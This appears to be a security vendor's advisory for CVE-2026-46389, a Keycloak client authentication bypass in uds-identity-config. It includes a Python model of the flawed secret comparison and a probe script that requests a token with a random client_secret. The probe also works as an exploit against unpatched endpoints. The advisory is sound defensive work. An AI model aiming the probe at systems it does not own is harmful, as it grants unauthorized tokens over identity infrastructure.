CVE-2026-46389: UDS Identity Config has a client authentication bypass in `ClientIdAndKubernetesSecretAuthenticator`
UDS Identity Config builds the Keycloak configuration image (realm, plugins, theme, truststore, JARs) consumed by UDS Core's Identity deployment. In versions 0.11.0 through 0.26.0, a logic error in the `client-kubernetes-secret` Keycloak client authenticator (shipped by `uds-identity-config` and consumed by UDS Core) causes the submitted `client_secret` to be overwritten with the mounted Kubernetes secret before the comparison, so the comparison always succeeds. An attacker who can reach the Keycloak token endpoint and knows a `client_id` that uses this authenticator can authenticate as that client with any `client_secret` value and obtain OAuth2 tokens scoped to the client's service account. In the case of the `uds-operator` client, that token can be used to read and modify other clients. Version 0.26.1 patches the issue.
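The following is an added model of the comparison bug as the advisory describes it, not code from `uds-identity-config` or Keycloak (the real authenticator is a Java Keycloak plugin). It puts the flawed check beside a corrected one and drives both through a stand-in token endpoint; the function names, the client table and the secret values are assumptions.

```python
"""Model of the client_secret comparison bug: submitted value overwritten
with the mounted Kubernetes secret before comparison.

Added illustration, not the project's code. Client table, secret values
and function names are assumptions.
"""
import hmac
import secrets

# Constructed stand-in for the Kubernetes secret mounted into the Keycloak
# pod, keyed by client_id. Random so the example runs offline.
MOUNTED_SECRETS = {
    "uds-operator": secrets.token_urlsafe(32),
}


def authenticate_vulnerable(client_id: str, submitted_secret: str) -> bool:
    """Mirrors the described logic error: the caller's value is replaced by
    the mounted value before the comparison, so any secret passes for a
    known client_id."""
    mounted = MOUNTED_SECRETS.get(client_id)
    if mounted is None:
        return False
    submitted_secret = mounted          # the bug: caller input discarded
    return submitted_secret == mounted  # always True


def authenticate_fixed(client_id: str, submitted_secret: str) -> bool:
    """Compare the caller-supplied secret against the mounted one in
    constant time, leaving the submitted value untouched."""
    mounted = MOUNTED_SECRETS.get(client_id)
    if mounted is None:
        return False
    return hmac.compare_digest(
        submitted_secret.encode("utf-8"), mounted.encode("utf-8")
    )


def token_endpoint(authenticator, form: dict) -> tuple[int, dict]:
    """Minimal stand-in for POST .../protocol/openid-connect/token with
    grant_type=client_credentials. Returns (status, json_body)."""
    if form.get("grant_type") != "client_credentials":
        return 400, {"error": "unsupported_grant_type"}
    if authenticator(form.get("client_id", ""), form.get("client_secret", "")):
        return 200, {"access_token": "opaque-token-for-" + form["client_id"],
                     "token_type": "Bearer"}
    return 401, {"error": "invalid_client"}


def demo() -> dict:
    """Send a bogus secret and the real one to both authenticators."""
    bogus = {"grant_type": "client_credentials",
             "client_id": "uds-operator", "client_secret": "anything"}
    real = dict(bogus, client_secret=MOUNTED_SECRETS["uds-operator"])
    return {
        "vulnerable_bogus": token_endpoint(authenticate_vulnerable, bogus)[0],
        "vulnerable_real": token_endpoint(authenticate_vulnerable, real)[0],
        "fixed_bogus": token_endpoint(authenticate_fixed, bogus)[0],
        "fixed_real": token_endpoint(authenticate_fixed, real)[0],
        "fixed_unknown_client": token_endpoint(
            authenticate_fixed, dict(real, client_id="nope"))[0],
    }


if __name__ == "__main__":
    print(demo())
```

The point of the model is the single assignment before the comparison: once the caller's value is replaced by the server's own copy, the equality check compares the mounted secret with itself, which is why the CVSS vector carries PR:N. The fixed variant also uses a constant-time comparison, which is the usual shape for secret checks even though timing is not the issue here.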
Metrics
- CVSS v3.1: 10.0
- Severity: CRITICAL
- Fixed in: 0.26.1
- Affected Products: 1
HarborGuard Analysis
Synopsis
An authentication bypass vulnerability exists in the `ClientIdAndKubernetesSecretAuthenticator` component of UDS Identity Config, a package that builds the Keycloak configuration image used by UDS Core. The flaw is reachable over the network with no credentials required, and stems from a logic error that overwrites the submitted client secret with the mounted Kubernetes secret before comparison, so any secret value is accepted. Successful exploitation lets an attacker obtain OAuth2 tokens scoped to the targeted client's service account and, in the case of the `uds-operator` client, read and modify other registered OAuth2 clients. HarborGuard tracks this advisory and will make a patched-image rebuild available once the upstream fix (0.26.1) is confirmed in its feeds.
HarborGuard Coverage
Detection capability for CVE-2026-46389 is available across every HarborGuard environment; the CVE is ingested from upstream feeds within minutes of publication and matched against customer images in connected registries and CI pipelines, including internally built images layered on top of affected base versions. Any image shipping `uds-identity-config` at versions 0.11.0 through 0.26.0, and therefore the affected `client-kubernetes-secret` authenticator, is flagged automatically.
HarborGuard surfaces this CVE with its CVSS v3.1 score of 10.0 (Critical) and applies each customer organization's compliance policy weighting to prioritize routing. Findings are directed to the appropriate team inbox within the customer org based on image ownership and environment tagging.
HarborGuard re-checks the advisory on every ingest cycle and makes a patched-image rebuild available automatically once the upstream maintainers' corrected release (0.26.1 per the advisory) is confirmed in its feeds. For customers who opt into auto-remediation, the rebuild, regression test run, and PR against affected workloads are triggered without manual intervention.
Exploit Conditions
- Network reachability: Required. The attacker must be able to reach the Keycloak token endpoint over the network; no foothold on the host is required.
- Authentication: Not required. No credentials are needed prior to exploitation; the vulnerability is in the mechanism that would otherwise enforce authentication.
- Victim interaction: Not required. No user action is needed; the attacker sends a crafted token request directly to the service.
- Attack complexity: Low (AC:L). The exploit is reliable and condition-free, requiring only a reachable token endpoint and a known `client_id` that uses the vulnerable authenticator.
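Because the conditions above reduce to "one token request with a made-up secret", the presence of the bug in a deployment you operate can be confirmed with the same request. The script below is an added example, not a HarborGuard or uds-identity-config tool: it posts a `client_credentials` grant with a random (and therefore wrong) `client_secret` and classifies the response. The token URL, the `client_id`, and the sample responses used for the offline run are assumptions; run it only against Keycloak instances you own.

```python
"""Check whether a Keycloak client still accepts an arbitrary client_secret.

Added example, not the project's or HarborGuard's code. The endpoint URL,
client_id and the constructed SAMPLE_RESPONSES are assumptions.
"""
import json
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable

# (url, urlencoded body) -> (http status, response body)
Transport = Callable[[str, bytes], tuple[int, bytes]]


def urllib_transport(url: str, body: bytes) -> tuple[int, bytes]:
    """Real HTTP POST; returns status and body even for 4xx responses."""
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(status: int, body: bytes) -> str:
    """Map a token-endpoint response to a verdict. A 200 carrying an
    access_token for a secret we just invented means client_secret was
    ignored, which is the bug this advisory describes."""
    try:
        doc = json.loads(body or b"{}")
    except json.JSONDecodeError:
        return "inconclusive"
    if status == 200 and "access_token" in doc:
        return "vulnerable"
    if status in (400, 401) and doc.get("error") in (
            "invalid_client", "unauthorized_client"):
        return "not_vulnerable"
    return "inconclusive"


def probe(token_url: str, client_id: str,
          transport: Transport = urllib_transport) -> str:
    """POST client_credentials with a random, guaranteed-wrong secret."""
    form = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": secrets.token_urlsafe(24),  # cannot be the real one
    }).encode()
    status, body = transport(token_url, form)
    return classify(status, body)


# Constructed responses so the check can be exercised offline.
SAMPLE_RESPONSES = {
    "patched": (401, b'{"error":"invalid_client",'
                     b'"error_description":"Invalid client credentials"}'),
    "unpatched": (200, b'{"access_token":"opaque","token_type":"Bearer",'
                       b'"expires_in":300}'),
}


def fake_transport(which: str) -> Transport:
    """Transport that replays one of the constructed responses."""
    return lambda url, body: SAMPLE_RESPONSES[which]


if __name__ == "__main__":
    # Host and realm path are assumptions; replace with your own.
    url = "https://sso.example.internal/realms/uds/protocol/openid-connect/token"
    for name in SAMPLE_RESPONSES:
        print(name, probe(url, "uds-operator", transport=fake_transport(name)))
```

A `vulnerable` verdict means the endpoint minted a token for a secret that could not possibly match; treat the returned token as a live credential and revoke the client's sessions after testing. An `inconclusive` result (for example a 403 from a network policy, or a non-JSON body from a proxy) says nothing about the authenticator and should be re-run from a vantage point that can actually reach Keycloak.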
Blast Radius
- Attacker obtains valid OAuth2 access tokens scoped to any targeted client service account that uses the `client-kubernetes-secret` authenticator.
- If the `uds-operator` client is targeted, the attacker gains the ability to read and modify other registered OAuth2 clients in the Keycloak realm.
- Any service account permissions bound to a compromised client token are accessible, which may include downstream API calls, secrets access, or cluster-level operations depending on the deployment.
- Full confidentiality, integrity, and availability of the identity plane are at risk given the CVSS C:H/I:H/A:H rating, and the changed scope (S:C) reflects that a token issued by Keycloak grants access to resources beyond Keycloak itself.
How HarborGuard Handles This
HarborGuard re-evaluates the advisory for CVE-2026-46389 on every ingest cycle and will surface a patched-image rebuild as soon as the corrected defenseunicorns release (0.26.1 per the advisory) is confirmed in its feeds. Until the rebuild is rolled out, customers are advised to restrict access to the Keycloak token endpoint with network-policy controls that allow only known internal service CIDRs, reducing the pool of potential attackers who can reach the vulnerable authenticator. Egress filtering at the namespace level can further limit lateral movement if a token is obtained. Where compliance policy permits and auto-remediation is enabled, HarborGuard will automatically trigger a rebuild, run regression tests, and open a PR against affected workloads once the upstream fix is confirmed, with a median time from CVE publication to merged patch PR of around 90 minutes for Critical-severity issues in auto-remediation-enabled environments.
Affected Products
- defenseunicorns / uds-identity-config: >= 0.11.0, < 0.26.1
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H